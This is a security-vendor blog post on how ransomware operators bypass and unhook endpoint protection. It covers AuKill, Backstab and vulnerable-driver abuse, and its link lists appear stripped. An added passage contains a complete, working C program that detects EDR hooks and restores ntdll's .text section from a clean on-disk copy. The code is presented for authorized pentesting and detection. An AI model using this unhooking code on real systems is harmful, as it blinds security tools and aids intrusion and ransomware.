Bypassing, Evading and Unhooking Endpoint Security Solutions

Written by
Anthony M. Freed
Published on
May 23, 2023

According to the most recent estimates, nearly half of organizations experienced a ransomware attack in the last year. Ransomware is no longer considered just a technical threat, but rather the largest single risk to any organization.  

Endpoint protection (EPP) products on the market today are robust against many threats, yet they clearly do not fully protect organizations against ransomware; if they did, high-profile attacks would not be making headlines daily.

Why are ransomware attacks so successful? There are many reasons, but a key one is that ransomware operators deploy advanced evasion techniques designed to blind or completely circumvent traditional endpoint protection solutions.

Endpoint Security Under Attack

Recently, researchers reported a new attack tool called AuKill that abuses a legitimately signed but outdated Microsoft Process Explorer driver to disable Endpoint Detection and Response (EDR) processes, a bring-your-own-vulnerable-driver (BYOVD) technique, before deploying stealthy backdoors and ultimately delivering ransomware payloads.

Analysis shows that AuKill resembles Backstab, an open-source tool used by the LockBit gang that abuses the same Process Explorer driver to terminate protected security processes. These are only a fraction of the tools and techniques attackers use to bypass, unhook, or simply blind endpoint protection solutions.

For example, attackers have long used what are known as "universal unhooking" techniques. EDR sensors typically place inline hooks on user-mode API functions (most often the exports of ntdll.dll) so that every call passes through the sensor first; unhooking restores the original bytes of those functions, for instance from a clean copy of the DLL on disk, so the sensor no longer sees subsequent API calls. Attackers use this to hijack execution flow, deploy a rootkit, and hide the processes and network connections that follow. Universal unhooking blinds the endpoint protection tool to the malicious activity, rendering it ineffective for detecting the attack.
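As an added example (not from this post, and not from the tkmru resource list cited below), the following C program shows what an inline hook on an ntdll export looks like, how to detect it by comparing the live prologue against a clean copy, and the "full unhook" that copies the .text section of a pristine ntdll.dll mapped from disk over the loaded module. It assumes x64 Windows, that the sensor hooks with a relative or absolute JMP at function entry, and that ntdll.dll lives at C:\Windows\System32; the sample stub bytes, including the system service number 0x18, are constructed for illustration and not taken from any real build. The detect and restore helpers are portable and run anywhere; the ntdll mapping only compiles on Windows.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* An EDR inline hook overwrites the first bytes of an ntdll export with a jump into the
 * vendor's DLL: E9 rel32 (jmp rel32) or FF 25 disp32 (jmp qword ptr [rip+disp32]).
 * An unhooked x64 Nt* stub begins with 4C 8B D1 B8 (mov r10,rcx ; mov eax,SSN). */
typedef enum { HOOK_NONE = 0, HOOK_JMP_REL32 = 1, HOOK_JMP_ABS = 2, HOOK_OTHER = 3 } hook_kind;

/* Compare a live prologue against a clean copy taken from the on-disk image. */
hook_kind classify_prologue(const uint8_t *live, const uint8_t *clean, size_t n)
{
    if (memcmp(live, clean, n) == 0) return HOOK_NONE;
    if (n >= 5 && live[0] == 0xE9) return HOOK_JMP_REL32;
    if (n >= 6 && live[0] == 0xFF && live[1] == 0x25) return HOOK_JMP_ABS;
    return HOOK_OTHER;
}

/* Overwrite live bytes with clean ones; returns how many bytes changed.
 * On Windows the pages are made writable first; elsewhere these are plain buffers. */
size_t restore_bytes(uint8_t *live, const uint8_t *clean, size_t n)
{
    size_t changed = 0;
    for (size_t i = 0; i < n; i++) changed += (live[i] != clean[i]);
    if (changed == 0) return 0;
#ifdef _WIN32
    DWORD old;
    if (!VirtualProtect(live, n, PAGE_EXECUTE_READWRITE, &old)) return 0;
    memcpy(live, clean, n);
    VirtualProtect(live, n, old, &old);
    FlushInstructionCache(GetCurrentProcess(), live, n);
#else
    memcpy(live, clean, n);
#endif
    return changed;
}

#ifdef _WIN32
/* The "full unhook": map a pristine ntdll.dll as an image (SEC_IMAGE lays sections out at
 * their virtual addresses, so no RVA arithmetic) and copy its .text over the loaded copy.
 * Every user-mode hook in ntdll is gone at once; kernel callbacks and ETW are untouched.
 * Returns bytes restored, 0 if nothing differed, -1 on error. */
int unhook_ntdll_text(void)
{
    HMODULE live = GetModuleHandleA("ntdll.dll");
    HANDLE f = CreateFileA("C:\\Windows\\System32\\ntdll.dll", GENERIC_READ,
                           FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (!live || f == INVALID_HANDLE_VALUE) return -1;
    HANDLE map = CreateFileMappingA(f, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    BYTE *clean = map ? (BYTE *)MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0) : NULL;
    int rc = -1;
    if (clean) {
        IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)live;
        IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((BYTE *)live + dos->e_lfanew);
        IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt);
        for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
            if (memcmp(sec->Name, ".text", 5) != 0) continue;
            rc = (int)restore_bytes((BYTE *)live + sec->VirtualAddress,
                                    clean + sec->VirtualAddress, sec->Misc.VirtualSize);
        }
        UnmapViewOfFile(clean);
    }
    if (map) CloseHandle(map);
    CloseHandle(f);
    return rc;
}
#endif

/* Constructed sample (not a real capture): a clean x64 stub with a made-up SSN of 0x18,
 * and the same stub after a sensor planted a 5-byte relative jump on its entry. */
static const uint8_t CLEAN_STUB[16]  = { 0x4C,0x8B,0xD1,0xB8,0x18,0x00,0x00,0x00, 0xF6,0x04,0x25,0x08,0x03,0xFE,0x7F,0x01 };
static const uint8_t HOOKED_STUB[16] = { 0xE9,0x11,0x22,0x33,0x44,0x00,0x00,0x00, 0xF6,0x04,0x25,0x08,0x03,0xFE,0x7F,0x01 };

/* Detect -> restore -> re-check on the constructed sample; returns 1 on success. */
int demo(void)
{
    uint8_t live[16];
    memcpy(live, HOOKED_STUB, sizeof live);
    hook_kind before = classify_prologue(live, CLEAN_STUB, sizeof live);
    size_t changed = restore_bytes(live, CLEAN_STUB, sizeof live);
    hook_kind after = classify_prologue(live, CLEAN_STUB, sizeof live);
    printf("before=%d changed=%zu after=%d\n", before, changed, after);
    return before == HOOK_JMP_REL32 && changed == 5 && after == HOOK_NONE;
}

int main(void)
{
#ifdef _WIN32
    printf("ntdll .text bytes restored: %d\n", unhook_ntdll_text());
#endif
    return demo() ? 0 : 1;
}
```

Run this under an EDR agent (with authorization) as part of an endpoint pentest: the restored-byte count tells you whether the sensor relies on ntdll hooks at all. A count of zero means either nothing in ntdll was hooked or the product instruments through kernel callbacks, ETW and minifilters instead, which this unhook does not touch. The defender's check is the mirror image: the unhook itself (a process writing to ntdll's .text, or mapping ntdll with SEC_IMAGE) is a higher-fidelity detection signal than the hooks it removes, and a sensor that only hooks user mode will not see either.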

Overall, of the top 20 most active ransomware groups, the majority have been observed leveraging one or more bypass and evasion techniques to get around security tools.

Pentesting Your Endpoint Security

Simply put, ransomware operators and other threat actors are adept at bypassing security controls, and there are numerous examples of hard-coded AV/NGAV/EDR/XDR bypasses written into malicious code that let attackers slip by without triggering any detections.

The following, as provided on GitHub by tkmru, co-founder and CTO of Sterra Security, are just a few of the bypass techniques and tools organizations can use to pentest the efficacy of their endpoint defenses. These tools and techniques are also useful in internal incident response exercises run under the assumption that endpoint controls can and will be bypassed.

Understanding how and when endpoint security solutions fail, and what steps to take after a failure to preserve defense-in-depth and organizational resilience, better prepares organizations for the (almost) inevitable day they become the target of a ransomware (or other) attack:

Proof-of-Concept Resources:

Bypass and Evasion Tools:

Bypass and Evasion Presentations:

Additional Resources:

And one more – this great presentation discussing insights on EDR inner workings and evasion options from Karsten Nohl and Jorge Gimenez:  

Organizations require both a robust prevention strategy and an agile resilience strategy to defend against today's more complex ransomware attacks. Endpoint protection solutions remain part of that strategy even though they can be bypassed or unhooked in some cases. This is why resilience is key to a sound security posture: with resilience planning, organizations can limit the impact of a ransomware payload on operations.

As attackers continue to automate their attack progression, exploiting known vulnerabilities for initial access and refining bypass and evasion techniques for stealthy payload delivery, security teams need to better understand where and how their organizations are at risk, and take steps to prepare for the inevitable.

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more. And check out the Recent Ransomware Attacks resource site to get near real-time tracking of ransomware attacks, threat actor groups and their victims.
